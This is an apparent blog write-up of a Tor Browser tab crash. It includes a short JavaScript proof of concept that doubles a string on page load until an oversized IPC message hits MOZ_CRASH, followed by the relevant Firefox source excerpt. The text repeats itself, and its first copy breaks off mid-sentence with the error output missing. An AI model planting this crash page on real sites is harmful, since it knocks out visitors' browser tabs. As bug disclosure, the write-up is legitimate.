Hi Internet,
IPC : Inter-process communication is a protocol short form of IPDL is a mozilla specific language to pass messages between process and threads in secure way.
Note: Most of the IPC based crashes in browser is not eligible for BBB //Not Sure
Snip Code :
<script>
function tor()
{
var uristring = unescape("%u4141%u4141");
for(i=0; i <= 50 ; ++i)
{
uristring+=uristring;
document.write(uristring);
}
document.write(uristring);
}
</script>
</head>
<body onload="tor()">
</body>
Running the above code in TOR crashes the tab - 'Gah! This tab has crashed.
Running TOR in debug mode generated this below error :
So, this seems to be kind of a resource exhaustion attack that leads to a crash in TOR, For instance if you try in a vanilla Firefox it freezes your page and if one disables multiprocess mode one can witness this behavior in a Tor Browser as well.
Running the snip code Asan build gets :
Looking at the particular code you'll see:
So, what seems to be happening here is that without
This crashes at MOZ_CRASH() because IPC Message is too large. This issue was marked as informative by TOR via H1
IPC : Inter-process communication is a protocol short form of IPDL is a mozilla specific language to pass messages between process and threads in secure way.
Note: Most of the IPC based crashes in browser is not eligible for BBB //Not Sure
Snip Code :
<script>
function tor()
{
var uristring = unescape("%u4141%u4141");
for(i=0; i <= 50 ; ++i)
{
uristring+=uristring;
document.write(uristring);
}
document.write(uristring);
}
</script>
</head>
<body onload="tor()">
</body>
Running the above code in TOR crashes the tab - 'Gah! This tab has crashed.
Running TOR in debug mode generated this below error :
So, this seems to be kind of a resource exhaustion attack that leads to a crash in TOR, For instance if you try in a vanilla Firefox it freezes your page and if one disables multiprocess mode one can witness this behavior in a Tor Browser as well.
Running the snip code Asan build gets :
Looking at the particular code you'll see:
#ifdef MOZ_CRASHREPORTER
CrashReporter::AnnotateCrashReport(NS_LITERAL_CSTRING("IPCMessageName"), nsDependentCString(msg->name()));
CrashReporter::AnnotateCrashReport(NS_LITERAL_CSTRING("IPCMessageSize"), nsPrintfCString("%d", msg->size()));
#endif
MOZ_CRASH("IPC message size is too large");So, what seems to be happening here is that without
--disable-crashreporter (which is used for vanilla Firefox builds) the tab loading your code is stuck in the #ifdef MOZ_CRASHREPORTER block while Tor Browser (which uses --disable-crashreporter) is hitting the MOZ_CRASH() call directly.This crashes at MOZ_CRASH() because IPC Message is too large. This issue was marked as informative by TOR via H1
0 coment�rios:
Post a Comment